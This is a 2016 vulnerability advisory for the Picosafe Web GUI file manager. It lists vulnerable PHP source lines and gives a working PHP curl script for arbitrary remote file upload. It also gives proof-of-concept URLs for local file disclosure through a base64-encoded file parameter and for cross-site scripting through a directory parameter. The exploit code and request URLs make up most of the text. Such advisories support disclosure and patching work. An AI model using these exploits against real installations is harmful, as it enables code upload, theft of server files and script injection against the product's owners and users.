[-] Title : Picosafe Web Gui - Multiple Vulnerabilities
[-] Author : Shahab Shamsi
[-] Vendor : https://github.com/embeddedprojects/picosafe_webgui
[-] Category : Webapps
[-] Date : 01.October.2016
Vulnerable page :
picosafe_webgui/webinterface/js/filemanager/filemanager.php
==========================
| Remote File Upload :
==========================
Vulnerable Source (RFU) :
52: chmod($to, 0755);
48: $to = realpath($curdir) . '/' . $name;
40: function uploadfile($curdir)
46: $name = $_FILES['files']['name'][0];
Exploit :
<?php
$uploadfile="YourFileName";
$ch = curl_init("http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location :
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/FileName
==========================
| Local File Disclosure :
==========================
Vulnerable Source (LFD) :
17: $file = base64_decode($_GET['file']);
18: DownloadFile($file);
111: readfile($file);
POC :
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?file=base64code-Filename
==========================
| Cross-Site Scripting :
==========================
Vulnerable Source (XSS) :
8: echo json_encode($data);
7: $data = sortfiles($data);
6: $data = listdirectory($directory);
5: $directory = base64_decode($_GET['directory']);
POC :
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=Base64-ScriptingCode
